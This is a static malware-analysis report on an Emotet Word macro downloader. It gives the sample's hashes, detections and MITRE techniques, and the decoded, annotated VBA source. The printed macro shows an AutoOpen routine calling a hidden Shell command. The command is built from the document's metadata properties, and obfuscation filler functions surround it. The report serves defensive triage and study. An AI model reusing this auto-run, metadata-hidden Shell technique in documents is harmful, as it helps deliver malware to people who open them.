Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a2fe92fa39d6b0f9…

MALICIOUS

Office (OLE)

63.5 KB Created: 2017-09-19 20:21:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: aa89188c9d784ef7777411a60014a3a9 SHA-1: f3dfc70ef70ae97b7a4fac56e9daac7c82321b0a SHA-256: a2fe92fa39d6b0f9dbfebd83be179524fadb87b11e555eee96c606af7d34ce73
172 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

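The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3, indicating it is likely part of the Emotet botnet. Static analysis reveals the presence of VBA macros, including an AutoOpen macro, and a critical heuristic firing for a potential Shell call. The VBA script itself is heavily obfuscated, but its structure and the heuristic firings suggest it is designed to download and execute a secondary payload. The Shell argument is assembled from the document properties "xVaRBHEx", "zLnUYyAY" and "Comments" rather than from literals in the macro, so the command itself does not appear in the extracted script and has to be recovered from the document's metadata. The extracted 'macros.bas' file, which holds the decoded VBA source, further supports this.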

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Function wmLBTdd()
    VBA.Shell$ "" + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.CustomDocumentProperties("xVaRBHEx") + ActiveDocument.CustomDocumentProperties("zLnUYyAY") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.BuiltInDocumentProperties("Comments") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + MxttMnex, 0
    End Function
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
    wmLBTdd
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4506 bytes
SHA-256: 951bf33fec7c5ad820b90c015c6088280fd8cd800a641440b0314efc74e0418e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 114 identifiers look randomly generated (e.g. 'zCFWChLpvnu') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module attributes for the document module "ThisDocument", as emitted in the decoded VBA source.
' No procedures appear between these attributes and the next module header in this listing.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Header of a second module, "Module1"; presumably the procedures listed after it belong to this module.
Attribute VB_Name = "Module1"

' Analyst note: nothing in this listing calls FwZAgpSHcGg (autoopen calls only wmLBTdd), so it
' looks like filler emitted by the obfuscator rather than part of the execution path.
Public Function FwZAgpSHcGg() As Integer
FzKGWXrr = 4971
' KSWnTMHbt is not assigned anywhere in this listing, so Asc() is handed an uninitialised value.
aHyNTSGpN = KSWnTMHbt
EufBaDTKvYx = Asc(aHyNTSGpN)
If FzKGWXrr > EufBaDTKvYx Then
    For SKzFdaV = 1933 To 4203
       SRxyxsZ = EufBaDTKvYx + SKzFdaV
    Next SKzFdaV
SRxyxsZ = SRxyxsZ + FzKGWXrr
FBgYkSaakT = CStr(SRxyxsZ)
' The Mid() start offsets below are far larger than the short numeric strings they index.
SXTcfFuaf = Mid(FBgYkSaakT, 1650, 5699)
dXvyZsw = dXvyZsw & "3196"
FwZAgpSHcGg = CInt(Mid(dXvyZsw, 3260, 3559))
Else
' Constant arithmetic plus a message box with a random-looking string; no file, network or process call.
FwZAgpSHcGg = 401 + 2793 + 3500 / 4838 / 3564 / 128 - 7739 - 5979 - 6617 + 1223 + 3619 + 7300
MsgBox ("YyMCEyD")

' NOTE(review): no End If closes the If/Else before End Function as dumped; confirm against the original macro stream.
End Function
 
' Analyst note: same template as the other Integer functions in this listing and not called
' from autoopen or wmLBTdd; it appears to be padding, not payload logic.
Public Function FUdZfmbaNZ() As Integer
xbysxZkZWg = 2990
' YUvXXpc is not assigned anywhere in this listing.
xxGEaNh = YUvXXpc
tFPNTZWwfwC = Asc(xxGEaNh)
If xbysxZkZWg > tFPNTZWwfwC Then
    For zVADYWKyb = 1248 To 5926
       TFbxbZsyD = tFPNTZWwfwC + zVADYWKyb
    Next zVADYWKyb
TFbxbZsyD = TFbxbZsyD + xbysxZkZWg
ewLcmTFvkv = CStr(TFbxbZsyD)
' Mid() start offsets again exceed the length of the short strings being sliced.
NaTdrew = Mid(ewLcmTFvkv, 3133, 9241)
YXmDESyZ = YXmDESyZ & "1754"
FUdZfmbaNZ = CInt(Mid(YXmDESyZ, 2992, 7129))
Else
' Constant arithmetic followed by message boxes with random-looking strings; no I/O or process creation.
FUdZfmbaNZ = 6493 + 1685 + 5730 + 5879 / 2370 / 939 - 5177 - 4144 - 6673 + 3728 + 9324 + 5645
MsgBox ("FYYptmBaYc")
 MsgBox ("ASxsHWVw")
 MsgBox ("ChukvHuwR")

' NOTE(review): the If/Else has no End If in this dump; confirm against the original macro stream.
End Function
 
' Analyst note: another instance of the repeated Integer-function template; nothing in this
' listing calls it, so it is most likely obfuscation filler.
Public Function MumrSNXBAKT() As Integer
wbLuEkhTfCS = 1902
' bFdWhpuu is not assigned anywhere in this listing.
umZsXzmE = bFdWhpuu
pPbFmsy = Asc(umZsXzmE)
If wbLuEkhTfCS > pPbFmsy Then
    For LgNKhzzn = 1374 To 6456
       AGPVMppn = pPbFmsy + LgNKhzzn
    Next LgNKhzzn
AGPVMppn = AGPVMppn + wbLuEkhTfCS
hkZDnYyC = CStr(AGPVMppn)
' The second Mid() below starts far past the end of the short string it slices.
sLYAGFRSdU = Mid(hkZDnYyC, 69, 8327)
fbwGraDfWvb = fbwGraDfWvb & "6898"
MumrSNXBAKT = CInt(Mid(fbwGraDfWvb, 3129, 5083))
Else
' Constant arithmetic followed by message boxes with random-looking strings; no I/O or process creation.
MumrSNXBAKT = 1451 + 9244 + 938 + 3011 / 7208 / 4282 - 9340 - 1631 + 4616 + 9163 + 5242
MsgBox ("xvtezsHkH")
 MsgBox ("mDBykBEKHZ")

' NOTE(review): the If/Else has no End If in this dump; confirm against the original macro stream.
End Function

' Entry point: Word runs a macro named AutoOpen when the document is opened with macros enabled.
' Its only statement hands control to wmLBTdd, the procedure that contains the Shell call.
Sub autoopen()
wmLBTdd
End Sub
' The one operational procedure in this listing: a single Shell call, reached from autoopen.
' The command string is a concatenation of:
'   - variables (bBMgBTW, WkRabYhn, fcZcwsL, GxREutDWt, dSgDrAWffZC, ANsdRyHYgN, MxttMnex) that are
'     not assigned anywhere in this listing, so they presumably contribute nothing to the string;
'   - the custom document properties "xVaRBHEx" and "zLnUYyAY";
'   - the built-in document property "Comments".
' The executed command therefore lives in the document's metadata, not in the macro text. Triage
' should dump those three properties from the sample (e.g. with oletools' olemeta) to recover it.
' The trailing 0 is the Shell window-style argument (vbHide), i.e. the child process gets no visible window.
Public Function wmLBTdd()
VBA.Shell$ "" + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.CustomDocumentProperties("xVaRBHEx") + ActiveDocument.CustomDocumentProperties("zLnUYyAY") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.BuiltInDocumentProperties("Comments") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + MxttMnex, 0
End Function

' Analyst note: repeated Integer-function template, not called from autoopen or wmLBTdd in this
' listing; it appears to be obfuscation filler.
Public Function SgwMWHLWCC() As Integer
tgsUMeZsX = 1803
' hspDnpCsw is not assigned anywhere in this listing.
LpvLKZXfn = hspDnpCsw
kUbuagM = Asc(LpvLKZXfn)
If tgsUMeZsX > kUbuagM Then
    For gerZDuDRAVd = 1987 To 7221
       rbbZhXRVSK = kUbuagM + gerZDuDRAVd
    Next gerZDuDRAVd
rbbZhXRVSK = rbbZhXRVSK + tgsUMeZsX
xxWSfhM = CStr(rbbZhXRVSK)
' Mid() start offsets exceed the length of the short strings being sliced.
zCFWChLpvnu = Mid(xxWSfhM, 3382, 6652)
BrCvYWre = BrCvYWre & "6097"
SgwMWHLWCC = CInt(Mid(BrCvYWre, 2692, 3746))
Else
' Constant arithmetic followed by message boxes with random-looking strings; no I/O or process creation.
SgwMWHLWCC = 2437 + 3173 + 8806 / 8080 / 5710 / 1565 - 4967 - 3976 + 3744 + 4892
MsgBox ("thyxnDmtEM")
 MsgBox ("yWSMxava")
 MsgBox ("DUvVybrbVh")
 MsgBox ("kDcAHpZcFmL")
 MsgBox ("GLppftMdg")

' NOTE(review): the If/Else has no End If in this dump; confirm against the original macro stream.
End Function
 
' Analyst note: repeated Integer-function template, not called from autoopen or wmLBTdd in this
' listing; it appears to be obfuscation filler.
Public Function greZaumUXAD() As Integer
gWvZpuFA = 5106
' bZEnSrgGRM is not assigned anywhere in this listing.
AdHcDaXrU = bZEnSrgGRM
cghLTWnhFWb = Asc(AdHcDaXrU)
If gWvZpuFA > cghLTWnhFWb Then
    For NrFtuhfMv = 1981 To 3435
       PEWKkgUtWu = cghLTWnhFWb + NrFtuhfMv
    Next NrFtuhfMv
PEWKkgUtWu = PEWKkgUtWu + gWvZpuFA
yhWRHBDgCR = CStr(PEWKkgUtWu)
' Mid() start offsets exceed the length of the short strings being sliced.
xTkNmXDn = Mid(yhWRHBDgCR, 2004, 6795)
ZdCuVgNmCh = ZdCuVgNmCh & "9595"
greZaumUXAD = CInt(Mid(ZdCuVgNmCh, 850, 5993))
Else
' Constant arithmetic followed by message boxes with random-looking strings; no I/O or process creation.
greZaumUXAD = 175 + 5287 + 4613 + 1463 / 5030 / 434 - 6249 - 1028 - 1828 + 1963 + 1892
MsgBox ("AuGYrZr")
 MsgBox ("KXFDyCke")
 MsgBox ("skyzFRDL")
 MsgBox ("SYYkULMSFg")
 MsgBox ("EUrZtKY")

' NOTE(review): the If/Else has no End If in this dump; confirm against the original macro stream.
End Function
 
' Analyst note: repeated Integer-function template, not called from autoopen or wmLBTdd in this
' listing; it appears to be obfuscation filler.
Public Function SxWPsmKy() As Integer
AGreHaMNX = 2348
' CYynzWA is not assigned anywhere in this listing.
BNEZvPeX = CYynzWA
sxgezFrwhxY = Asc(BNEZvPeX)
If AGreHaMNX > sxgezFrwhxY Then
    For PCaDdyDmVRZ = 529 To 9239
       WpNBuNcvWgY = sxgezFrwhxY + PCaDdyDmVRZ
    Next PCaDdyDmVRZ
WpNBuNcvWgY = WpNBuNcvWgY + AGreHaMNX
fpKcwtByAy = CStr(WpNBuNcvWgY)
' Mid() start offsets exceed the length of the short strings being sliced.
cnzbftMBZk = Mid(fpKcwtByAy, 1078, 5847)
DPVVbHrW = DPVVbHrW & "3988"
SxWPsmKy = CInt(Mid(DPVVbHrW, 2781, 8234))
Else
' Constant arithmetic followed by message boxes with random-looking strings; no I/O or process creation.
SxWPsmKy = 906 + 451 + 1341 + 6534 / 6830 / 9368 / 8717 - 4565 - 5470 - 4918 + 3383 + 4193
MsgBox ("wFTaWgCCX")
 MsgBox ("GXRUKFH")
 MsgBox ("CXxWnXaW")
 MsgBox ("PAnYeXApE")
 MsgBox ("mvHpSrLMT")
 MsgBox ("xsYTcyGB")

' NOTE(review): the If/Else has no End If in this dump; confirm against the original macro stream.
End Function